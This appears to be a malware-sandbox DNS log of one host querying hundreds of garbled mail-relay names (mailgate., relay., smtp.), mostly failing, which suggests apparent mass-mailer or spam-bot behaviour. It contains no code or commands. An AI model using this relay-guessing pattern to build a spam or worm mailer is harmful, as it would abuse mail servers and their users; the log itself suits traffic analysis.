Nov 30, 2023 11:22:46.544095039 CET	1.1.1.1	192.168.2.4	0x3d58	Name error (3)	mailgate.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.547282934 CET	1.1.1.1	192.168.2.4	0x60cd	Name error (3)	relay.gmaigcmar19l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.547607899 CET	1.1.1.1	192.168.2.4	0x85f7	Name error (3)	smtp.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.549328089 CET	1.1.1.1	192.168.2.4	0x77b8	Server failure (2)	mailgate.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.550208092 CET	1.1.1.1	192.168.2.4	0x5363	Name error (3)	mail.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.550338984 CET	1.1.1.1	192.168.2.4	0x5363	Name error (3)	mail.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.555907965 CET	1.1.1.1	192.168.2.4	0x7de	Name error (3)	mailgate.klp.tn	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.559504032 CET	1.1.1.1	192.168.2.4	0xd2e7	Name error (3)	relay.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.582825899 CET	1.1.1.1	192.168.2.4	0xd089	Name error (3)	mailgate.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.582854033 CET	1.1.1.1	192.168.2.4	0xd089	Name error (3)	mailgate.e.gr	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.594696045 CET	1.1.1.1	192.168.2.4	0x68d6	Name error (3)	relay.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.682539940 CET	1.1.1.1	192.168.2.4	0x5796	Name error (3)	mail.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.682560921 CET	1.1.1.1	192.168.2.4	0x5796	Name error (3)	mail.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.692909956 CET	1.1.1.1	192.168.2.4	0xf476	Name error (3)	mailgate.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.768944025 CET	1.1.1.1	192.168.2.4	0x1a6	No error (0)	mail.nr.net		104.238.144.219	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.770347118 CET	1.1.1.1	192.168.2.4	0x93ae	Name error (3)	relay.as.hauet	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.770385027 CET	1.1.1.1	192.168.2.4	0x6373	Name error (3)	relay.comcaci.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.775156975 CET	1.1.1.1	192.168.2.4	0xb65d	Name error (3)	relay.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.778395891 CET	1.1.1.1	192.168.2.4	0xae32	Name error (3)	relay.yahpl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.778837919 CET	1.1.1.1	192.168.2.4	0xed5	Name error (3)	relay.sbcgloboo.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.911883116 CET	1.1.1.1	192.168.2.4	0x84f4	Name error (3)	mail.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.911953926 CET	1.1.1.1	192.168.2.4	0x84f4	Name error (3)	mail.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.987685919 CET	1.1.1.1	192.168.2.4	0xb2f7	Name error (3)	relay.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:46.991847992 CET	1.1.1.1	192.168.2.4	0x7841	Name error (3)	mailgate.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.036468029 CET	1.1.1.1	192.168.2.4	0x7841	Name error (3)	mailgate.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.049439907 CET	1.1.1.1	192.168.2.4	0xd7d0	Name error (3)	relay.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.122483015 CET	1.1.1.1	192.168.2.4	0xe43d	Name error (3)	relay.ser711a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.136287928 CET	1.1.1.1	192.168.2.4	0x1e92	Name error (3)	relay.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.144439936 CET	1.1.1.1	192.168.2.4	0xd8e2	Name error (3)	mailgate.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.144475937 CET	1.1.1.1	192.168.2.4	0xd8e2	Name error (3)	mailgate.1rz.ramal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.155713081 CET	1.1.1.1	192.168.2.4	0x4644	Name error (3)	relay.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.191061020 CET	1.1.1.1	192.168.2.4	0x39bd	Name error (3)	smtp.comcaio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.195600033 CET	1.1.1.1	192.168.2.4	0x9a1c	Name error (3)	relay.sbcglob4m.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.200261116 CET	1.1.1.1	192.168.2.4	0x6f63	Name error (3)	relay.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.235625982 CET	1.1.1.1	192.168.2.4	0x504f	Name error (3)	mailgate.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.247792959 CET	1.1.1.1	192.168.2.4	0x2335	Name error (3)	relay.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.255987883 CET	1.1.1.1	192.168.2.4	0x574f	Name error (3)	relay.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.261853933 CET	1.1.1.1	192.168.2.4	0xabe3	Name error (3)	relay.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.274544954 CET	1.1.1.1	192.168.2.4	0x4644	Name error (3)	relay.loaquorezcil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.278603077 CET	1.1.1.1	192.168.2.4	0xe51d	Name error (3)	relay.asgmaanxgdil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.285132885 CET	1.1.1.1	192.168.2.4	0x4281	Name error (3)	relay.yahao.lsa	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.285940886 CET	1.1.1.1	192.168.2.4	0x838f	Name error (3)	relay.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.287283897 CET	1.1.1.1	192.168.2.4	0x2929	Name error (3)	relay.daytonpubhocso.cog	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.287424088 CET	1.1.1.1	192.168.2.4	0x4eb2	Name error (3)	relay.sgt9o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.288352013 CET	1.1.1.1	192.168.2.4	0x582b	Name error (3)	relay.tload.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.294061899 CET	1.1.1.1	192.168.2.4	0xa980	Name error (3)	mailgate.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.295764923 CET	1.1.1.1	192.168.2.4	0xb7e4	Name error (3)	relay.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.322706938 CET	1.1.1.1	192.168.2.4	0x5a10	Name error (3)	relay.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.323486090 CET	1.1.1.1	192.168.2.4	0x84a4	Name error (3)	relay.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.324105024 CET	1.1.1.1	192.168.2.4	0x7c38	Name error (3)	relay.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.326136112 CET	1.1.1.1	192.168.2.4	0x6501	Name error (3)	relay.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.328013897 CET	1.1.1.1	192.168.2.4	0x7a01	Name error (3)	relay.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.328257084 CET	1.1.1.1	192.168.2.4	0xccba	Name error (3)	mailgate.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.330488920 CET	1.1.1.1	192.168.2.4	0x9fc2	Name error (3)	relay.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.341382027 CET	1.1.1.1	192.168.2.4	0x1c2d	Name error (3)	relay.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.342742920 CET	1.1.1.1	192.168.2.4	0x6b3	Name error (3)	smtp.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.352443933 CET	1.1.1.1	192.168.2.4	0xf03c	Name error (3)	relay.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.383331060 CET	1.1.1.1	192.168.2.4	0x2f97	Name error (3)	relay.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.430206060 CET	1.1.1.1	192.168.2.4	0x4f6a	Server failure (2)	relay.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.462510109 CET	1.1.1.1	192.168.2.4	0x650d	Name error (3)	relay.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.464786053 CET	1.1.1.1	192.168.2.4	0xf8a3	Name error (3)	relay.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.550951958 CET	1.1.1.1	192.168.2.4	0xd05e	Name error (3)	mail.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.564332008 CET	1.1.1.1	192.168.2.4	0x650d	Name error (3)	relay.rambojoocta.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.564635992 CET	1.1.1.1	192.168.2.4	0xb7e4	Name error (3)	relay.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.564675093 CET	1.1.1.1	192.168.2.4	0xccba	Name error (3)	mailgate.a0i.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.564871073 CET	1.1.1.1	192.168.2.4	0xf8a3	Name error (3)	relay.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.564904928 CET	1.1.1.1	192.168.2.4	0x9fc2	Name error (3)	relay.ez786-lcolwicn.coofmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.564920902 CET	1.1.1.1	192.168.2.4	0x6f63	Name error (3)	relay.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.565171957 CET	1.1.1.1	192.168.2.4	0x1c2d	Name error (3)	relay.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.565942049 CET	1.1.1.1	192.168.2.4	0x4f6a	Server failure (2)	relay.h4y.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.565984964 CET	1.1.1.1	192.168.2.4	0x6b3	Name error (3)	smtp.osrniamadvea.lrhzda.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.566037893 CET	1.1.1.1	192.168.2.4	0x7a01	Name error (3)	relay.deptka7ffmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.566234112 CET	1.1.1.1	192.168.2.4	0xf03c	Name error (3)	relay.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.566425085 CET	1.1.1.1	192.168.2.4	0x84a4	Name error (3)	relay.hl.comuk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.568545103 CET	1.1.1.1	192.168.2.4	0x7c38	Name error (3)	relay.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.568922043 CET	1.1.1.1	192.168.2.4	0x5a10	Name error (3)	relay.hgaarnlundejl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.568939924 CET	1.1.1.1	192.168.2.4	0x2f97	Name error (3)	relay.gmdcblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.569510937 CET	1.1.1.1	192.168.2.4	0xd05e	Name error (3)	mail.mess.ck	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.569895983 CET	1.1.1.1	192.168.2.4	0x6501	Name error (3)	relay.aomttdl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.574625015 CET	1.1.1.1	192.168.2.4	0xf788	Name error (3)	smtp.gtblil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.579684019 CET	1.1.1.1	192.168.2.4	0x39f0	Name error (3)	smtp.caatholiomissa.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.680449963 CET	1.1.1.1	192.168.2.4	0x3a6c	Name error (3)	relay.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.708081007 CET	1.1.1.1	192.168.2.4	0x70e2	Name error (3)	relay.yahgr.neaco	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.713182926 CET	1.1.1.1	192.168.2.4	0x3cbe	Name error (3)	relay.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.718761921 CET	1.1.1.1	192.168.2.4	0x33f2	Name error (3)	relay.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		165.227.156.49	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		5.161.194.135	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		162.55.164.116	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		165.227.159.144	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		91.107.214.206	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		167.235.143.33	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		178.62.199.248	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		5.161.98.212	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		49.13.4.90	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.722824097 CET	1.1.1.1	192.168.2.4	0xcee5	No error (0)	mail.h-email.net		5.75.171.74	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.828030109 CET	1.1.1.1	192.168.2.4	0x84fd	Name error (3)	relay.yahio.comcm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.840747118 CET	1.1.1.1	192.168.2.4	0xc3f6	Name error (3)	smtp.wr.omt222lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.892570019 CET	1.1.1.1	192.168.2.4	0xb0c6	Name error (3)	smtp.jubo.cath	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.950881958 CET	1.1.1.1	192.168.2.4	0x65c2	Name error (3)	relay.mn.ch	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.951535940 CET	1.1.1.1	192.168.2.4	0x9195	Name error (3)	relay.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.957004070 CET	1.1.1.1	192.168.2.4	0x497b	Name error (3)	smtp.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.961291075 CET	1.1.1.1	192.168.2.4	0xf6a6	Name error (3)	smtp.23xd5a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.961625099 CET	1.1.1.1	192.168.2.4	0x8bd7	Name error (3)	relay.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.965146065 CET	1.1.1.1	192.168.2.4	0x7670	Name error (3)	relay.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.971101046 CET	1.1.1.1	192.168.2.4	0xf6dd	Name error (3)	smtp.kni.ol168.ecom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.994966984 CET	1.1.1.1	192.168.2.4	0xe19b	Name error (3)	smtp.wn26lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.996146917 CET	1.1.1.1	192.168.2.4	0x11ab	Name error (3)	relay.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.996154070 CET	1.1.1.1	192.168.2.4	0x72d1	Name error (3)	relay.oa.lagdfillemlmlml00xydurail.jkeziac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.996196985 CET	1.1.1.1	192.168.2.4	0xfeaf	Name error (3)	relay.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.996793985 CET	1.1.1.1	192.168.2.4	0x97c8	Name error (3)	relay.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.997802019 CET	1.1.1.1	192.168.2.4	0x693b	Name error (3)	relay.yahe.nen	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:47.997860909 CET	1.1.1.1	192.168.2.4	0x9422	Name error (3)	smtp.yahpn.yb	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.027605057 CET	1.1.1.1	192.168.2.4	0xe7ac	Name error (3)	relay.qhlil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.050370932 CET	1.1.1.1	192.168.2.4	0xf6cd	Name error (3)	relay.geu015naryo-uail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.051743984 CET	1.1.1.1	192.168.2.4	0x77b9	Name error (3)	relay.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.065725088 CET	1.1.1.1	192.168.2.4	0x134a	Name error (3)	smtp.cucumbnr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.067117929 CET	1.1.1.1	192.168.2.4	0x439b	Name error (3)	relay.gez542l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.075098991 CET	1.1.1.1	192.168.2.4	0xbcff	Name error (3)	smtp.he0114zusmg454lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.082212925 CET	1.1.1.1	192.168.2.4	0x4e09	Name error (3)	relay.gmaiuilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.119736910 CET	1.1.1.1	192.168.2.4	0xfeaf	Name error (3)	relay.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.145317078 CET	1.1.1.1	192.168.2.4	0x97ae	Name error (3)	relay.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.192570925 CET	1.1.1.1	192.168.2.4	0xba55	Name error (3)	smtp.hotmea1aia.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.242048025 CET	1.1.1.1	192.168.2.4	0x972	Name error (3)	smtp.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.242141008 CET	1.1.1.1	192.168.2.4	0xb161	Name error (3)	relay.ochcar.cin4g9tdamn.bagcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.302443027 CET	1.1.1.1	192.168.2.4	0xd2fb	Name error (3)	mailgate.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.302539110 CET	1.1.1.1	192.168.2.4	0x6ab5	Name error (3)	relay.acooil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.333285093 CET	1.1.1.1	192.168.2.4	0xf1a4	Name error (3)	smtp.domo5ho.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.335565090 CET	1.1.1.1	192.168.2.4	0xe85f	Name error (3)	relay.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.336581945 CET	1.1.1.1	192.168.2.4	0xcabf	Name error (3)	mail.yah23051987hont.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.339265108 CET	1.1.1.1	192.168.2.4	0x221e	Name error (3)	smtp.yahwoooie2ampu.comsh	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.342844009 CET	1.1.1.1	192.168.2.4	0xf4d	Name error (3)	relay.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.343581915 CET	1.1.1.1	192.168.2.4	0x4c4b	Name error (3)	smtp.hot13l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.344460964 CET	1.1.1.1	192.168.2.4	0xb2f7	Name error (3)	smtp.t-yil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.344770908 CET	1.1.1.1	192.168.2.4	0x1a3b	Name error (3)	smtp.f.nyhm	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.345336914 CET	1.1.1.1	192.168.2.4	0xe1cd	Name error (3)	smtp.horadguc1995l.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.346910000 CET	1.1.1.1	192.168.2.4	0x2b21	Name error (3)	relay.yahgt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.349107981 CET	1.1.1.1	192.168.2.4	0x1dbe	Name error (3)	smtp.acesineuiw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.355313063 CET	1.1.1.1	192.168.2.4	0xdb9d	Name error (3)	mail.z-a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.369293928 CET	1.1.1.1	192.168.2.4	0xcb34	Name error (3)	smtp.lyco2.comom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.387307882 CET	1.1.1.1	192.168.2.4	0x5106	Name error (3)	relay.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.411467075 CET	1.1.1.1	192.168.2.4	0x5106	Name error (3)	relay.il.om	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.423698902 CET	1.1.1.1	192.168.2.4	0x362d	Name error (3)	mail.tbsayail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.444715977 CET	1.1.1.1	192.168.2.4	0xe274	Name error (3)	relay.gmai76afmail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.454104900 CET	1.1.1.1	192.168.2.4	0x8b17	Name error (3)	relay.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.468314886 CET	1.1.1.1	192.168.2.4	0x5a9a	Name error (3)	smtp.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.489123106 CET	1.1.1.1	192.168.2.4	0xb36d	Name error (3)	smtp.7.dceilil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.491971016 CET	1.1.1.1	192.168.2.4	0x7cbf	Name error (3)	smtp.comcamm.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.492721081 CET	1.1.1.1	192.168.2.4	0xbca5	Server failure (2)	relay.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.493139982 CET	1.1.1.1	192.168.2.4	0x9ca4	Name error (3)	smtp.a.o.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.494544983 CET	1.1.1.1	192.168.2.4	0x7b11	Name error (3)	smtp.nnblmogblmoglil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.495032072 CET	1.1.1.1	192.168.2.4	0x7073	Name error (3)	smtp.yahfll.ianus	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.495474100 CET	1.1.1.1	192.168.2.4	0x15f1	Name error (3)	smtp.getococuail.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.497428894 CET	1.1.1.1	192.168.2.4	0x2a7f	Name error (3)	smtp.ezi.adompany.at	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.499588966 CET	1.1.1.1	192.168.2.4	0x9d7	Name error (3)	smtp.ayls.xcom	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.501543999 CET	1.1.1.1	192.168.2.4	0xc4e4	Name error (3)	smtp.h2.spainvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.529613018 CET	1.1.1.1	192.168.2.4	0x78cb	Name error (3)	smtp.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.530107021 CET	1.1.1.1	192.168.2.4	0x4fb6	Name error (3)	smtp.ho10a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.543318987 CET	1.1.1.1	192.168.2.4	0xc451	Name error (3)	smtp.qebyte.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.543550968 CET	1.1.1.1	192.168.2.4	0x8bc8	Name error (3)	smtp.n.n.amdiu	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.548599958 CET	1.1.1.1	192.168.2.4	0x8b17	Name error (3)	relay.buromaril.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.550671101 CET	1.1.1.1	192.168.2.4	0xd136	Name error (3)	smtp.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.557801962 CET	1.1.1.1	192.168.2.4	0x1be7	Name error (3)	smtp.rhacmtu.au	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.568236113 CET	1.1.1.1	192.168.2.4	0xe4f7	Name error (3)	smtp.slyvor.as290a.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.568783045 CET	1.1.1.1	192.168.2.4	0x19c5	Name error (3)	smtp.syn.lil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.573124886 CET	1.1.1.1	192.168.2.4	0xb158	Name error (3)	smtp.e-fja8mso.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.573508024 CET	1.1.1.1	192.168.2.4	0xbca5	Server failure (2)	relay.rknsieiwn.ail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.580616951 CET	1.1.1.1	192.168.2.4	0x5a9a	Name error (3)	smtp.gbivlporollm.cz	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.580629110 CET	1.1.1.1	192.168.2.4	0x78cb	Name error (3)	smtp.feoio.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.582129955 CET	1.1.1.1	192.168.2.4	0x1189	Name error (3)	smtp.t.ahlfth	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.582716942 CET	1.1.1.1	192.168.2.4	0xd3c1	Name error (3)	smtp.asail.co.uk	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.583312988 CET	1.1.1.1	192.168.2.4	0x393b	Name error (3)	smtp.s.ddo	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.585371017 CET	1.1.1.1	192.168.2.4	0xb6a1	Name error (3)	smtp.pyctl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:22:48.599755049 CET	1.1.1.1	192.168.2.4	0x51d9	Name error (3)	relay.yahnt.net	none	none	A (IP address)	IN (0x0001)	false
